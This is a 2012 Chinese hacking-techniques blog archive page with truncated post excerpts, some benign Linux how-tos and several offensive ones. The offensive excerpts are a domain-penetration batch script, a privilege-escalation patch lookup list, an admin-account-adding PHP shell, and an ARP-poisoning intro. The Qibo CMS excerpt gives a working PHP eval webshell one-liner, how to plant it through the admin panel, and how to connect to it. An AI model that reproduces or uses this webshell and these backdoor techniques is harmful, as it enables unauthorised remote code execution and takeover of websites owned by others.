本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 技术文章

域渗透用的批处理

2012.08.18 , , No Comments ,

@echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" ...

一些本地提权漏洞,对应的补丁序列号[转]

2012.08.15 , , No Comments ,

一些本地提权漏洞,对应的补丁序列号,提权的时候会用到,先看看打没打补丁,再决定用哪个。这样不用做无用功。 KB2360937 →MS10-084 KB2478960 →MS11-014 KB2507938→ MS11-056 KB2566454→ MS11-062 KB2646524 →MS12-003 KB2645640→ MS12-009 KB2641...

Linux 系统下各种包的安装方法

2012.08.11 , , No Comments ,

一、rpm包安装方式步骤: 1、找到相应的软件包,比如soft.version.rpm,下载到本机某个目录; 2、打开一个终端,su -成root用户; 3、cd soft.version.rpm所在的目录; 4、输入rpm -ivh soft.version.rpm 二、deb包安装方式步骤: 1、找到相应的软件包,比如soft.version.deb,下载到本机...

齐博CMS后台拿shell

2012.08.9 , , No Comments ,

百度搜索了下,还没大牛发出来过。 进入后台后:到快捷菜单----独立页面管理---增加页面---插入特俗一句话(<?php $_GET['ts7']($_POST['cmd']);?> 这个一句话一般防火墙是不会杀的。 然后菜刀连接如:  www.i0day.com/test.php?ts7=assert 密码cmd

linux一键搭建VPN脚本[转]

2012.08.2 , , No Comments ,

首先,这脚本写的粗糙。大牛别笑话小菜了。 Ps:这脚本只能运行在Linux下,Unix下是不行的。(就算你手动UNIX下也是很难装成功的) 搭建成功以后,账户是vpn 密码是vpn365 代码如下: #!/bin/sh echo -e "\033[1;035m \n" echo "#######################################...

新浪SAE实现数据库连接

2012.08.2 , , No Comments ,

此账号仅能在SAE平台上使用,不能从外部连接 我们建议开发者使用SaeMysql操作数据库 如果您想自己实现数据库相关操作,可以使用以下常量: 用户名  : SAE_MYSQL_USER 密  码 : SAE_MYSQL_PASS 主库域名 : SAE_MYSQL_HOST_M 从库域名 : SAE_MYSQL_HOST_S 端  口 : SAE_MYS...

PHP版Shell.Users加管理员

2012.07.31 , , No Comments ,

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen 以及wscript.shell 组建被禁用的情况下,这也许是一个机会。 代码如下: <?php echo "<div align=center><b>PHP 版Shell.Users加管理员帐号</b>...

中间人攻击–ARP毒化[转]

2012.07.30 , , No Comments ,

中间人攻击虽然古老,但仍处于受到黑客攻击的危险中,可能会严重导致危害服务器和用户。仍然有很多变种的中间人攻击是有效的,它们能够很容易的欺骗外行并且入侵他们。正如字面意思一样,中间人攻击就是攻击者扮演中间人并且实施攻击。它有时被称为monkey-in-the-middle攻击更先进的说它是man-in-the-browser攻击和man-in-the-mobile攻击。...

lanmp_wdcp_v2.4快速安装

2012.07.30 , , No Comments ,

lanmp一键安装包是wdlinux官网2010年开始推出的lamp,lnmp,lnamp(apache,nginx,php,mysql,zend,eAccelerator,pureftpd)应用环境的快速简易安装包,执行一个脚本,整个环境就安装完成就可使用,快速,方便易用,安全稳定. 但由于源码编译需要比较长的时间(30分钟至几小时不等),具体根据机器配置的不同,所...

Linux下Find命令使用大全

2012.07.14 , , No Comments ,

开始之前,我们先来看一下 find 命令的基本结构: find start_directory test options criteria_to_match action_to_perform_on_results 在以下命令中,find将开始在当前目录(用“.”表示)中查找任何扩展名为“java”的文件: find . -name "*.java" 以下命...